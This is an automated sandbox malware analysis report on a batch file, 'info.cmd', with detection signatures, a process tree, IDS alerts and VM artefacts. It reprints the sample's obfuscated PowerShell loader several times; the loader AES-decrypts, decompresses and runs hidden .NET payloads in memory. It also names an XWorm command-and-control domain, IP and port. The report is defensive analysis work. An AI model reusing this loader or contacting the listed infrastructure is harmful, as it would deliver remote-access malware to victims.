
Windows Analysis Report
info.cmd

Overview

General Information

Sample name:info.cmd
Analysis ID:1446781
MD5:43f3ee9c714203eeccd5503d17a36105
SHA1:d554becc96c1296d948382fd2ea8c1a1ad0184c8
SHA256:c153c05ebbf7db866984c1b21da5bfebbaedcfa5fce0cecb09a50377e0503a53
Tags:cmd
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic
Yara detected Powershell decode and execute
Bypasses PowerShell execution policy
Obfuscated command line found
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Gzip Archive Decode Via PowerShell
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 5448 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\info.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4940 cmdline: cmd /c "set __=^&rem" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 5656 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pPLpJHM4GQSp820ezozLInZkcLGjwzAfhFyAUo/d1yU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kFkMa+H0Xjazq+yg0jtHMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $liFcl=New-Object System.IO.MemoryStream(,$param_var); $YKPPP=New-Object System.IO.MemoryStream; $DrFOQ=New-Object System.IO.Compression.GZipStream($liFcl, [IO.Compression.CompressionMode]::Decompress); $DrFOQ.CopyTo($YKPPP); $DrFOQ.Dispose(); $liFcl.Dispose(); $YKPPP.Dispose(); $YKPPP.ToArray();}function execute_function($param_var,$param2_var){ $aGqbX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rErds=$aGqbX.EntryPoint; $rErds.Invoke($null, $param2_var);}$UsDBW = 'C:\Users\user\Desktop\info.cmd';$host.UI.RawUI.WindowTitle = $UsDBW;$rybfn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UsDBW).Split([Environment]::NewLine);foreach ($bSMhM in $rybfn) { if ($bSMhM.StartsWith('WUgLizIwoCqVFjuaxzXG')) { $FYrof=$bSMhM.Substring(20); break; }}$payloads_var=[string[]]$FYrof.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 5536 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass MD5: 04029E121A0CFA5991749937DD22A1D9)
      • wermgr.exe (PID: 3360 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5536" "1456" "1404" "1220" "0" "0" "1504" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup
No configs have been found
Source: \Device\ConDrv, Rule: JoeSecurity_PowershellDecodeAndExecute, Description: Yara detected Powershell decode and execute, Author: Joe Security
Source: amsi64_5536.amsi.csv, Rule: JoeSecurity_PowershellDecodeAndExecute, Description: Yara detected Powershell decode and execute, Author: Joe Security

      System Summary

      Source: Process started, Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\info.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5448, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, ProcessId: 5536, ProcessName: powershell.exe
      Source: Process started, Author: frack113, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\info.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5448, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, ProcessId: 5536, ProcessName: powershell.exe
      Source: Process started, Author: Hieu Tran, Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pPLpJHM4GQSp820ezozLInZkcLGjwzAfhFyAUo/d1yU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kFkMa+H0Xjazq+yg0jtHMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $liFcl=New-Object System.IO.MemoryStream(,$param_var); $YKPPP=New-Object System.IO.MemoryStream; $DrFOQ=New-Object System.IO.Compression.GZipStream($liFcl, [IO.Compression.CompressionMode]::Decompress); $DrFOQ.CopyTo($YKPPP); $DrFOQ.Dispose(); $liFcl.Dispose(); $YKPPP.Dispose(); $YKPPP.ToArray();}function execute_function($param_var,$param2_var){ $aGqbX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rErds=$aGqbX.EntryPoint; $rErds.Invoke($null, $param2_var);}$UsDBW = 'C:\Users\user\Desktop\info.cmd';$host.UI.RawUI.WindowTitle = $UsDBW;$rybfn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UsDBW).Split([Environment]::NewLine);foreach ($bSMhM in $rybfn) { if ($bSMhM.StartsWith('WUgLizIwoCqVFjuaxzXG')) { $FYrof=$bSMhM.Substring(20); break; }}$payloads_var=[string[]]$FYrof.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pPLpJHM4GQSp820ezozLInZkcLGjwzAfhFyAUo/d1yU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kFkMa+H0Xjazq+yg0jtHMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $liFcl=New-Object System.IO.MemoryStream(,$param_var); $YKPPP=New-Object System.IO.MemoryStream; $DrFOQ=New-Object System.IO.Compression.GZipStream($liFcl, [IO.Compression.CompressionMode]::Decompress); $DrFOQ.CopyTo($YKPPP); $DrFOQ.Dispose(); $liFcl.Dispose(); $YKPPP.Dispose(); $YKPPP.ToArray();}function execute
      Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\info.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5448, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass, ProcessId: 5536, ProcessName: powershell.exe
      Timestamp:05/23/24-21:10:10.754109
      SID:2852874
      Source Port:2905
      Destination Port:49705
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:05/23/24-21:10:10.754109
      SID:2852870
      Source Port:2905
      Destination Port:49705
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:05/23/24-21:07:45.319600
      SID:2855924
      Source Port:49705
      Destination Port:2905
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:05/23/24-21:08:53.440750
      SID:2853193
      Source Port:49705
      Destination Port:2905
      Protocol:TCP
      Classtype:A Network Trojan was detected


      Networking

      Source: Traffic, Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 163.172.59.233:2905 -> 192.168.2.8:49705
      Source: Traffic, Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 163.172.59.233:2905 -> 192.168.2.8:49705
      Source: Traffic, Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.8:49705 -> 163.172.59.233:2905
      Source: Traffic, Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.8:49705 -> 163.172.59.233:2905
      Source: unknown, DNS query: name: newremisco2905.duckdns.org
      Source: global traffic, TCP traffic: 192.168.2.8:49705 -> 163.172.59.233:2905
      Source: Joe Sandbox View, IP Address: 163.172.59.233 163.172.59.233
      Source: Joe Sandbox View, ASN Name: OnlineSASFR OnlineSASFR
      Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic, DNS traffic detected: DNS query: newremisco2905.duckdns.org
      Source: Amcache.hve.5.dr, String found in binary or memory: http://upx.sf.net
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process Stats: CPU usage > 49%
      Source: classification engine, Classification label: mal76.troj.evad.winCMD@9/9@1/1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2464:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Mutant created: \Sessions\1\BaseNamedObjects\0h9jcqiqjT5SnJcR
      Source: C:\Windows\System32\wermgr.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3360:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ve00zt2.aut.ps1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: unknown, Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\info.cmd" "
      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\cmd.exe cmd /c "set __=^&rem"
      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pPLpJHM4GQSp820ezozLInZkcLGjwzAfhFyAUo/d1yU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kFkMa+H0Xjazq+yg0jtHMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $liFcl=New-Object System.IO.MemoryStream(,$param_var); $YKPPP=New-Object System.IO.MemoryStream; $DrFOQ=New-Object System.IO.Compression.GZipStream($liFcl, [IO.Compression.CompressionMode]::Decompress); $DrFOQ.CopyTo($YKPPP); $DrFOQ.Dispose(); $liFcl.Dispose(); $YKPPP.Dispose(); $YKPPP.ToArray();}function execute_function($param_var,$param2_var){ $aGqbX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rErds=$aGqbX.EntryPoint; $rErds.Invoke($null, $param2_var);}$UsDBW = 'C:\Users\user\Desktop\info.cmd';$host.UI.RawUI.WindowTitle = $UsDBW;$rybfn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UsDBW).Split([Environment]::NewLine);foreach ($bSMhM in $rybfn) { if ($bSMhM.StartsWith('WUgLizIwoCqVFjuaxzXG')) { $FYrof=$bSMhM.Substring(20); break; }}$payloads_var=[string[]]$FYrof.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5536" "1456" "1404" "1220" "0" "0" "1504" "0" "0" "0" "0" "0"
      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\cmd.exe cmd /c "set __=^&rem"
      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pPLpJHM4GQSp820ezozLInZkcLGjwzAfhFyAUo/d1yU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kFkMa+H0Xjazq+yg0jtHMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $liFcl=New-Object System.IO.MemoryStream(,$param_var); $YKPPP=New-Object System.IO.MemoryStream; $DrFOQ=New-Object System.IO.Compression.GZipStream($liFcl, [IO.Compression.CompressionMode]::Decompress); $DrFOQ.CopyTo($YKPPP); $DrFOQ.Dispose(); $liFcl.Dispose(); $YKPPP.Dispose(); $YKPPP.ToArray();}function execute_function($param_var,$param2_var){ $aGqbX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rErds=$aGqbX.EntryPoint; $rErds.Invoke($null, $param2_var);}$UsDBW = 'C:\Users\user\Desktop\info.cmd';$host.UI.RawUI.WindowTitle = $UsDBW;$rybfn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UsDBW).Split([Environment]::NewLine);foreach ($bSMhM in $rybfn) { if ($bSMhM.StartsWith('WUgLizIwoCqVFjuaxzXG')) { $FYrof=$bSMhM.Substring(20); break; }}$payloads_var=[string[]]$FYrof.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
      Source: C:\Windows\System32\cmd.exe, Section loaded: cmdext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wbemcomn.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: avicap32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msvfw32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: winmm.dll
      Source: Window Recorder, Window detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

      Data Obfuscation

      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\cmd.exe cmd /c "set __=^&rem"
      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\cmd.exe cmd /c "set __=^&rem"
      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
      Source: C:\Windows\System32\cmd.exe, Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wermgr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3727
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6149
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5748 Thread sleep count: 3727 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5748 Thread sleep count: 6149 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5884 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Volume queried: C:\ FullSizeInformation
Source: Amcache.hve.5.dr Binary or memory string: VMware
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.5.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: wermgr.exe, 0000000C.00000003.3411164515.000001F6CE84B000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000000C.00000002.3412288571.000001F6CE84B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWt
Source: wermgr.exe, 0000000C.00000002.3412180204.000001F6CE7CB000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000000C.00000003.3411164515.000001F6CE84B000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000000C.00000002.3412288571.000001F6CE84B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
